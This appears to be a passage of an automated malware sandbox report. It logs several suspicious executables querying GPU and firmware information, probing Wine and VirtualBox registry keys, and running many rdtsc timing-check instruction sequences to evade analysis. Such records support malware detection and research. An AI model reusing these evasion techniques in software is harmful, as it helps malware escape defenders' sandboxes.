                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | System information queried: FirmwareTableInformation
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe | System information queried: FirmwareTableInformation
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: A18FE9 second address: A18FEE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B917BA second address: B917C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B917C3 second address: B917D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007FD668F2A766h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B90C5A second address: B90C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B90D8C second address: B90DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A770h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B90DA0 second address: B90DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B91069 second address: B9106F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B94139 second address: B94164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1CC3h], ecx 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push 1D3C1480h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD668F2A642h 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B94164 second address: B941DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1D3C1400h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD668F2A768h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1F06h], edi 0x00000030 push 00000003h 0x00000032 mov cx, 8041h 0x00000036 pushad 0x00000037 mov ecx, edi 0x00000039 movzx edi, si 0x0000003c popad 0x0000003d push 00000000h 0x0000003f jns 00007FD668F2A76Bh 0x00000045 push 00000003h 0x00000047 or dword ptr [ebp+122D1F74h], edx 0x0000004d push 960E14D9h 0x00000052 push edi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FD668F2A76Fh 0x0000005a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B941DF second address: B941E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B9425A second address: B94261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B94261 second address: B94305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2258h], esi 0x00000010 push 00000000h 0x00000012 add esi, 5A008FA0h 0x00000018 push 497DB4C4h 0x0000001d pushad 0x0000001e push ebx 0x0000001f jp 00007FD668F2A636h 0x00000025 pop ebx 0x00000026 pushad 0x00000027 jmp 00007FD668F2A647h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 xor dword ptr [esp], 497DB444h 0x00000037 mov edx, dword ptr [ebp+122D2016h] 0x0000003d push 00000003h 0x0000003f call 00007FD668F2A63Eh 0x00000044 jmp 00007FD668F2A63Eh 0x00000049 pop edi 0x0000004a push 00000000h 0x0000004c mov ecx, edx 0x0000004e push 00000003h 0x00000050 jl 00007FD668F2A642h 0x00000056 jno 00007FD668F2A63Ch 0x0000005c push 65AFE3CCh 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 jmp 00007FD668F2A645h 0x00000069 pop eax 0x0000006a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B94305 second address: B9430F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | RDTSC instruction interceptor: First address: B9430F second address: B9434D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5A501C34h 0x0000000f jns 00007FD668F2A63Ch 0x00000015 mov dword ptr [ebp+122D1F06h], edi 0x0000001b lea ebx, dword ptr [ebp+1244EE13h] 0x00000021 sub dword ptr [ebp+122D17EEh], ebx 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007FD668F2A640h 0x00000032 popad 0x00000033 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B9434D second address: B94353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94353 second address: B94357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB3635 second address: BB3641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD668F2A766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB3641 second address: BB3645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB37C2 second address: BB37DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A766h 0x0000000a jmp 00007FD668F2A772h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB43F4 second address: BB4400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD668F2A636h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B88EBD second address: B88EF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD668F2A777h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FD668F2A77Ch 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B88EF6 second address: B88EFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B32 second address: BB4B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B3C second address: BB4B5E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD668F2A636h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD668F2A646h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B5E second address: BB4B65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4CCB second address: BB4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F5A second address: BB4F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A776h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F79 second address: BB4F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 je 00007FD668F2A636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F94 second address: BB4FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A779h 0x00000008 jmp 00007FD668F2A773h 0x0000000d popad 0x0000000e pushad 0x0000000f jg 00007FD668F2A766h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4FD1 second address: BB4FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD668F2A638h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B83DFC second address: B83E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A50 second address: BB9A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD668F2A641h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A7E second address: BB9A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A84 second address: BB9A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B78161 second address: B78166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B78166 second address: B781CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FD668F2A64Eh 0x00000011 pushad 0x00000012 jmp 00007FD668F2A643h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FD668F2A645h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BBDAF6 second address: BBDB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 jng 00007FD668F2A766h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BBDB0D second address: BBDB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC13BA second address: BC13C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jng 00007FD668F2A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC17C8 second address: BC17CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC17CD second address: BC17F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A76Fh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jbe 00007FD668F2A778h 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FD668F2A766h 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC53FC second address: BC5421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jnc 00007FD668F2A63Ch 0x0000000f pushad 0x00000010 jmp 00007FD668F2A63Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4A2F second address: BC4A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4B6E second address: BC4B95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD668F2A63Ch 0x00000010 popad 0x00000011 jl 00007FD668F2A64Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jns 00007FD668F2A636h 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E17 second address: BC4E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FD668F2A779h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E37 second address: BC4E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E51 second address: BC4E74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD668F2A775h 0x0000000d jl 00007FD668F2A766h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FBE second address: BC4FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FD668F2A636h 0x0000000c popad 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FCB second address: BC4FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A778h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FE7 second address: BC503D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD668F2A646h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD668F2A647h 0x00000018 jng 00007FD668F2A64Bh 0x0000001e jmp 00007FD668F2A63Fh 0x00000023 jg 00007FD668F2A636h 0x00000029 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC503D second address: BC5043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC5043 second address: BC504D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC51F8 second address: BC51FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8141 second address: BC814B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81CB second address: BC81CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81CF second address: BC81D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81D3 second address: BC81D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81D9 second address: BC822E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3CD576CBh 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FD668F2A638h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 36391B88h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD668F2A642h 0x00000038 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC822E second address: BC8244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8590 second address: BC8598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8598 second address: BC859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC859E second address: BC85AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 js 00007FD668F2A63Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC9134 second address: BC9141 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC9141 second address: BC914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD668F2A636h 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD83 second address: BCAD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD89 second address: BCAD9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FD668F2A636h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FD668F2A636h 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD9F second address: BCADC4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD668F2A779h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCBE7 second address: BCCBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Fh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCBFA second address: BCCC68 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop eax 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FD668F2A768h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D1E65h], edx 0x00000036 push 00000000h 0x00000038 jmp 00007FD668F2A778h 0x0000003d push 00000000h 0x0000003f pushad 0x00000040 pushad 0x00000041 sub dword ptr [ebp+122D1846h], esi 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a popad 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCC68 second address: BCCC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCC6F second address: BCCC74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD6C7 second address: BCD6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD460 second address: BCD47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD668F2A771h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD47B second address: BCD481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD0AC6 second address: BD0ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD0ACC second address: BD0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD668F2A63Eh 0x0000000c rdtsc
